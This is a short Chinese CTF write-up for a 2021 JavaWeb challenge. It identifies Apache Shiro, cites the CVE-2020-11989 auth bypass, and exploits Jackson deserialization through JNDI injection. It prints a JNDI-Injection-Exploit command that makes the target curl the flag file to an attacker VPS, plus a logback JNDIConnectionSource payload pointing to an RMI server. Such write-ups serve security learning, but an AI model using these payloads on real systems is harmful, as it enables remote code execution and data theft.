[红明谷CTF 2021]JavaWeb

前言

一个shiro的cve

漏洞复现

题目描述让访问/login,访问后又让访问/json,但访问有跳转回/login

传点东西进去发现有rememberMe=deleteMe

image-20240616162647706

是个shiro,需要用到CVE-2020-11989(Apache Shiro 身份验证绕过漏洞)

一点注意的地方

springboot对浏览器的请求返回html的报错信息,而对其他客户端返回json格式报错信息,json格式的报错信息更加详细

刚开始就是没注意请求头中Accept,修改为*/*,表示接收所有格式的相响应,这样得到更多的信息

image-20240616163231535

jackson反序列化 利用工具https://github.com/welk1n/JNDI-Injection-Exploit/releases

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'curl http://VPS:7001 -File=@/flag' -A "VPS"

image-20240616163417686

vps监听相应端口

1
["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://vps:1099/b6e3e9"}]

image-20240616163542318